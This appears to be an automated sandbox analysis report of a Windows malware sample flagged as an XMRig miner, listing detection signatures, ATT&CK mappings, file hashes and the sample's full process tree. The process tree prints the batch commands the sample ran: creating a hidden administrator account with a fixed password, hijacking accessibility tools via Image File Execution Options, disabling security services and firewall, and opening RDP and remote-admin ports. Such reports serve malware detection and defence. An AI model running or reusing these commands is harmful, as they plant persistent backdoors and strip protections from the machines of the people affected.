Analysis
-
max time kernel
135s -
max time network
175s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
11-08-2020 12:30
General
-
Target
foo/bc6536b86b04cf5b3bf7cd353d615ab9.exe
Score
10/10
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Creates new service(s) 1 TTPs
-
Executes dropped EXE 1 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Sets file execution options in registry 2 TTPs
-
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 3 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Modifies file permissions 1 TTPs 2 IoCs
-
Modifies WinLogon 2 TTPs 13 IoCs
-
Drops file in System32 directory 6 IoCs
-
Drops file in Windows directory 8 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Modifies data under HKEY_USERS 2 IoCs
-
Runs net.exe
-
Suspicious behavior: LoadsDriver 10 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 3 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\foo\bc6536b86b04cf5b3bf7cd353d615ab9.exe"C:\Users\Admin\AppData\Local\Temp\foo\bc6536b86b04cf5b3bf7cd353d615ab9.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\foo\U.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 12513⤵
-
-
C:\Windows\SysWOW64\net.exenet user ontar /DELETE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user ontar /DELETE4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet user ontar Preaba1! /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user ontar Preaba1! /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Администраторы ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Администраторы ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Administrateurs ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrateurs ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Utilisateurs du Bureau а distance" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Utilisateurs du Bureau а distance" ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Beheerders ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Beheerders ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop-gebruikers" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop-gebruikers" ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Beheerders ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Beheerders ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop gebruikers" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop gebruikers" ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup ??? ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup ??? ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "??????" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "??????" ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup ??? ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup ??? ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "??????????????" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "??????????????" ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Administratorzy ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administratorzy ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Administratorer ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administratorer ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Brukere av eksternt skrivebord" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Brukere av eksternt skrivebord" ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Administradores ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administradores ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios Remote Desktop" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios Remote Desktop" ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Administradores ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administradores ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup gli amministratori ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup gli amministratori ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Utenti desktop remoto" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Utenti desktop remoto" ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup administratorer ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administratorer ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Anvandare av fjarrskrivbord" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Anvandare av fjarrskrivbord" ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Administratoren ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administratoren ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "RemoteDesktopBenutzer" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "RemoteDesktopBenutzer" ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Administratoren ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administratoren ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Benutzer" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Benutzer" ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Administradores ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administradores ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Utilizadores do ambiente de trabalho remoto" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Utilizadores do ambiente de trabalho remoto" ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Utenti desktop remoto" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Utenti desktop remoto" ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Administradores ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administradores ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup yoneticileri ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup yoneticileri ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzak masaustu kullan?c?lar?" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzak masaustu kullan?c?lar?" ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Narrator.exe" /v "debugger" /t REG_SZ /d "cmd.exe" /f3⤵
-
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /v "debugger" /t REG_SZ /d "cmd.exe" /f3⤵
-
-
C:\Windows\SysWOW64\net.exenet accounts /forcelogoff:no3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /forcelogoff:no4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited4⤵
-
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v helpassistant /t REG_DWORD /d "00000000" /f3⤵
- Modifies WinLogon
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ontar /t REG_DWORD /d "00000000" /f3⤵
- Modifies WinLogon
-
-
C:\Windows\SysWOW64\chcp.comchcp 12513⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SYSTEМ /t REG_DWORD /d "00000000" /f3⤵
- Modifies WinLogon
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Аdministrator /t REG_DWORD /d "00000000" /f3⤵
- Modifies WinLogon
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Aдминистратор /t REG_DWORD /d "00000000" /f3⤵
- Modifies WinLogon
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v RPLifeInterval /t REG_DWORD /d "00005180" /f3⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v SFCDisable /t REG_DWORD /d "FFFFFF9D" /f3⤵
-
-
C:\Windows\SysWOW64\sc.exesc config rasman start= auto3⤵
-
-
C:\Windows\SysWOW64\sc.exesc config remoteaccess start= auto3⤵
-
-
C:\Windows\SysWOW64\net.exenet start rasman3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rasman4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet start remoteaccess3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start remoteaccess4⤵
-
-
-
C:\Windows\SysWOW64\sc.exesc config wscsvc start= disabled3⤵
-
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
-
-
C:\Windows\SysWOW64\sc.exesc stop wscsvc3⤵
-
-
C:\Windows\SysWOW64\sc.exesc stop SharedAccess3⤵
-
-
C:\Windows\SysWOW64\sc.exesc create tlntsvr binPath= tlntsvr.exe3⤵
-
-
C:\Windows\SysWOW64\sc.exesc config tlntsvr start= auto3⤵
-
-
C:\Windows\SysWOW64\net.exenet start tlntsvr3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start tlntsvr4⤵
-
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f3⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x1 /f3⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" /t REG_DWORD /d 0x0 /f3⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f3⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v /t REG_DWORD /d 0x0 /f3⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening TCP 3389 system3⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening TCP 4899 system3⤵
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s "C:\Documents and settings\ontar" /S /D3⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\find.exeFind "="4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet user ontar Preaba1! /add /active:"yes" /expires:"never" /passwordchg:"NO"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user ontar Preaba1! /add /active:"yes" /expires:"never" /passwordchg:"NO"4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value4⤵
-
-
C:\Windows\SysWOW64\find.exeFind "="4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" ontar /add4⤵
-
-
-
C:\Windows\SysWOW64\net.exenet accounts /forcelogoff:no /maxpwage:unlimited3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited4⤵
-
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f3⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f3⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x1 /f3⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" /t REG_DWORD /d 0x0 /f3⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f3⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ontar /t REG_DWORD /d 0x0 /f3⤵
- Modifies WinLogon
-
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\0" /v "Version" /t REG_DWORD /d "196611" /f3⤵
-
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List\{00000000-0000-0000-0000-000000000000}" /v "StartTimeLo" /t REG_DWORD /d "2386147405" /f3⤵
-
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List\{00000000-0000-0000-0000-000000000000}" /v "EndTimeLo" /t REG_DWORD /d "2387249407" /f3⤵
-
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\GPO-List\0" /v "Version" /t REG_DWORD /d "196611" /f3⤵
-
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Status\GPExtensions\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}" /v "LastPolicyTime" /t REG_DWORD /d "19856934" /f3⤵
-
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v "UserAuthentication" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0x00000000 /f3⤵
-
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKLM\SYSTEM\ControlSet001\services\SharedAccess\Epoch" /v "Epoch" /t REG_DWORD /d "9412" /f3⤵
-
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Epoch" /v "Epoch" /t REG_DWORD /d "9412" /f3⤵
-
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKU\S-1-5-21-1252767878-4065156067-3399968500-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count" /v "P:\FUNER\Iveghny\Ertfubg.rkr" /t REG_BINARY /d "1300000002000000100000001a230500000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bfffffffff40e916d87c3bd30100000000" /f3⤵
-
-
C:\Windows\SysWOW64\attrib.exeattrib C:\users\ontar +r +a +s +h3⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\reg.exereg add «HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList» /v ontar /t REG_DWORD /d «00000000" /f3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\foo\SH.bat" "2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib -h -s -r C:\Windows\system32\dllcache3⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "debugger" /t REG_SZ /d "drmsvc.exe" /f3⤵
-
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ibhost.exe" /v "debugger" /t REG_SZ /d "drmsvc.exe" /f3⤵
-
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v "debugger" /t REG_SZ /d "wpmsvc.exe" /f3⤵
-
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Narrator.exe" /v "debugger" /t REG_SZ /d "cmd.exe" /f3⤵
-
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /v "debugger" /t REG_SZ /d "cmd.exe" /f3⤵
-
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uddisrw.exe" /v "debugger" /t REG_SZ /d "wpmsvc.exe" /f3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F C:\Windows\System32\sethc.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F C:\Windows\SysWOW64\sethc.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\dllcache\sethc.exe /G :F SYSTEM:F3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\dllcache\sethc.exe /G :F SYSTEM:F3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Windows10Upgrade.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f3⤵
-
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EOSNotify.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\foo\TSPatch.exe"C:\Users\Admin\AppData\Local\Temp\foo\TSPatch.exe" -silent2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s SstpSvc1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s RasMan1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
- Suspicious use of AdjustPrivilegeToken
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s RasMan1⤵
Network
MITRE ATT&CK Enterprise v6
Persistence
Account Manipulation
1Hidden Files and Directories
2Modify Existing Service
2New Service
1Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Defense Evasion
File and Directory Permissions Modification
1Hidden Files and Directories
2Impair Defenses
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
21ef54fce2b94d13c5c8bc294fbc5e11
SHA157a38e4649b34e4bb36b778c17de0804ac418132
SHA256896fe05ecf0c6826cb5265a43118fc242ecc7a5457e487a0976a73c514a4a16d
SHA5122f539290cb27bd88cdf73e976a9a77de951cdc2f428669bc472470cf9775f7c3e4c351e5eabdafeef074954fdd8efe61096a09dc1f1a2ee4ba72426e263378c7
-
MD5
c558680a720c1e3a317ae3ee9e4bdfda
SHA1a23b18726297c80b89e3de588666d116920c8f10
SHA2568c66a900102db758830c47c9e32076fabace6d81bc9ae0b50ba448880f5f1ff8
SHA5120bc22482c9cf8192a68dcc6c796c7316989f233142ee9ce906dd9408a05dd2c25598d33eaf79e6eccb5d23f95e57948fdfb706b26cf92a839b473e7b24d6955f
-
MD5
c558680a720c1e3a317ae3ee9e4bdfda
SHA1a23b18726297c80b89e3de588666d116920c8f10
SHA2568c66a900102db758830c47c9e32076fabace6d81bc9ae0b50ba448880f5f1ff8
SHA5120bc22482c9cf8192a68dcc6c796c7316989f233142ee9ce906dd9408a05dd2c25598d33eaf79e6eccb5d23f95e57948fdfb706b26cf92a839b473e7b24d6955f
-
MD5
1fae59414d8f21e40d105f47f6b23edd
SHA1c157832a5322d53130fa1e568abf7b66e2ae87cc
SHA256d58f99d63f3306ccc68130af6cd7e539198e26b0ce2cb647b3ac710b974cec7e
SHA512c579e56e3f449bcfc50c9d32f85bb55a0e2fd34d54146654188c38f7c2af529a04c9471afab10bf1c529cae9ef0c185a8712cf626c8c84a306dc3758dc29b538
-
MD5
48522d32f014350cb5b8d55ca8b52678
SHA14b84fedea40c4db502427cbc9e0ceffb18bf7033
SHA2567b0fd59157936cbaa2fe204fba06b22f11bfc5373aa7ea918a5c0e42035094bd
SHA51205bddf16831b456a66936af181bac73e23131e2d0698db0d1a93b51c60fdaedff1a389e6adf3cb619921211147ce54ca6c5be25dab4c79169e914dcc0b2a50ae
-
MD5
80648b43d233468718d717d10187b68d
SHA1a1736e8f0e408ce705722ce097d1adb24ebffc45
SHA2568ab9a39457507e405ade5ef9d723e0f89bc46d8d8b33d354b00d95847f098380
SHA512eec0ac7e7abcf87b3f0f4522b0dd95c658327afb866ceecff3c9ff0812a521201d729dd71d43f3ac46536f8435d4a49ac157b6282077c7c1940a6668f3b3aea9
-
MD5
01e21456e8000bab92907eec3b3aeea9
SHA139b34fe438352f7b095e24c89968fca48b8ce11c
SHA25635ad0403fdef3fce3ef5cd311c72fef2a95a317297a53c02735cda4bd6e0c74f
SHA5129d5153450e8fe3f51f20472bae4a2ab2fed43fad61a89b04a70325559f6ffed935dd72212671cc6cfc0288458d359bc71567f0d9af8e5770d696adc5bdadd7ec
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-